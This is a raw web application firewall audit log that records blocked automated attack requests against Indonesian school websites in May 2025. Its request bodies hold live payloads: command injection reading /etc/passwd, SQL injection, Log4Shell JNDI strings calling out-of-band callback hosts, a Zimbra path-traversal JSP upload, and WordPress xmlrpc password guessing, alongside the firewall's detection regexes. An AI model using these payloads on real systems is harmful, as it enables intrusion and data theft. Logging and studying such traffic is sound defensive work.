Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfb2d75d-Z-- --d797601f-A-- [27/May/2025:04:50:06 +0700] aDTiDhLFq2VRfSzm6b8KOAAAAJg 103.236.140.4 43906 103.236.140.4 8181 --d797601f-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168392278 --d797601f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d797601f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296206424101 3331 (- - -) Stopwatch2: 1748296206424101 3331; combined=1674, p1=487, p2=1157, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d797601f-Z-- --56c5f658-A-- [27/May/2025:04:59:05 +0700] aDTkKWTuEZUBy5rh0sZ69wAAABc 103.236.140.4 47344 103.236.140.4 8181 --56c5f658-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1516 User-Agent: Mozilla/5.0 (Linux; Android 8.0; Nexus 5X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --56c5f658-C-- system.multicall methodName wp.getUsersBlogs params admin smkn22-jkt --56c5f658-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56c5f658-E-- --56c5f658-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748296745848519 6367 (- - -) Stopwatch2: 1748296745848519 6367; combined=5009, p1=416, p2=4442, p3=0, p4=0, p5=89, sr=84, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56c5f658-Z-- --41726453-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7aQAAAAc 103.236.140.4 48138 103.236.140.4 8181 --41726453-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168411320 --41726453-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --41726453-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41726453-E-- --41726453-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748296997417039 1933 (- - -) Stopwatch2: 1748296997417039 1933; combined=501, p1=351, p2=117, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41726453-Z-- --f0f55858-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7bQAAAAw 103.236.140.4 48158 103.236.140.4 8181 --f0f55858-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168411323 --f0f55858-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0f55858-E-- --f0f55858-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997420136 2474 (- - -) Stopwatch2: 1748296997420136 2474; combined=1462, p1=322, p2=1112, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0f55858-Z-- --9d995a23-A-- [27/May/2025:05:03:17 +0700] aDTlJVuSH_Spa4YU2ZmqDQAAAM4 103.236.140.4 48176 103.236.140.4 8181 --9d995a23-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 164701896 --9d995a23-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --9d995a23-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d995a23-E-- --9d995a23-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997435008 2531 (- - -) Stopwatch2: 1748296997435008 2531; combined=1337, p1=352, p2=945, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d995a23-Z-- --99847357-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7bgAAAA0 103.236.140.4 48158 103.236.140.4 8181 --99847357-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 169021135 --99847357-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --99847357-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99847357-E-- --99847357-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997434240 4487 (- - -) Stopwatch2: 1748296997434240 4487; combined=3139, p1=467, p2=2646, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99847357-Z-- --69390934-A-- [27/May/2025:05:03:17 +0700] aDTlJWTuEZUBy5rh0sZ7cAAAAA4 103.236.140.4 48168 103.236.140.4 8181 --69390934-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168969435 --69390934-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --69390934-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69390934-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296997434466 4440 (- - -) Stopwatch2: 1748296997434466 4440; combined=3091, p1=332, p2=2723, p3=0, p4=0, p5=35, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69390934-Z-- --f22afe5d-A-- [27/May/2025:05:03:18 +0700] aDTlJmTuEZUBy5rh0sZ7cQAAABI 103.236.140.4 48150 103.236.140.4 8181 --f22afe5d-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0q9cd1gpeook7mlf7sg78j5ewygbknmu.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0q9cd1gpeook7mlf7sg4w4kjaiusoku4.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0q9cd1gpeook7mlf7sghg846ryefw3o7.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0q9cd1gpeook7mlf7sgtmuw3pi8pw38u.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0q9cd1gpeook7mlf7sgcjafcrcs7wdgf.oast.live} 
Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0q9cd1gpeook7mlf7sgwac54t77g48xn.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0q9cd1gpeook7mlf7sg9z9318aber6y3.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0q9cd1gpeook7mlf7sgh1jxcj86wmxwp.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0q9cd1gpeook7mlf7sgo76zr5th9bw3z.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0q9cd1gpeook7mlf7sg719z6ws8ic1o3.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0q9cd1gpeook7mlf7sgtn3kwrobbwfde.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0q9cd1gpeook7mlf7sg884uagf3fdyq8.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0q9cd1gpeook7mlf7sgjn8wxony1mzbn.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0q9cd1gpeook7mlf7sgsrp5ddnz45mis.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0q9cd1gpeook7mlf7sgfkenr1eqj46e1.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0q9cd1gpeook7mlf7sgdxio8uf7878me.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168392341 --f22afe5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f22afe5d-E-- --f22afe5d-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748296998120855 5777 (- - -) Stopwatch2: 1748296998120855 5777; combined=4282, p1=428, p2=3826, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f22afe5d-Z-- --aec64234-A-- [27/May/2025:05:04:05 +0700] aDTlVWTuEZUBy5rh0sZ7hAAAAAA 103.236.140.4 48260 103.236.140.4 8181 --aec64234-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 166620218 --aec64234-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M system.multicall methodName wp.getUsersBlogs params wakakur wakakur@1 --484bb60b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --484bb60b-E-- --484bb60b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (0+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748297085820633 7263 (- - -) Stopwatch2: 1748297085820633 7263; combined=5452, p1=461, p2=4811, p3=0, p4=0, p5=105, sr=95, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --484bb60b-Z-- --b184bf3f-A-- [27/May/2025:05:05:39 +0700] aDTls2TuEZUBy5rh0sZ7iAAAAAM 103.236.140.4 48280 103.236.140.4 8181 --b184bf3f-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166620221 --b184bf3f-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --b184bf3f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b184bf3f-E-- --b184bf3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748297139125989 2998 (- - -) Stopwatch2: 1748297139125989 2998; combined=1706, p1=416, p2=1252, p3=0, p4=0, p5=38, sr=104, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b184bf3f-Z-- --9b686532-A-- [27/May/2025:05:11:38 +0700] aDTnGt6cNBpj1JOkpQlKsAAAAFU 103.236.140.4 48392 103.236.140.4 8181 --9b686532-B-- POST /apply_sec.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/login_pic.asp Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/118.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: uid=1234123 X-Varnish: 166620263 --9b686532-C-- html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20%2Fetc%2Fpasswd --9b686532-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b686532-E-- --9b686532-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748297498841933 2695 (- - -) Stopwatch2: 1748297498841933 2695; combined=761, p1=526, p2=203, p3=0, p4=0, p5=32, sr=96, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b686532-Z-- --36358159-A-- [27/May/2025:05:16:36 +0700] aDToRN6cNBpj1JOkpQlKywAAAEg 103.236.140.4 48488 103.236.140.4 8181 --36358159-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 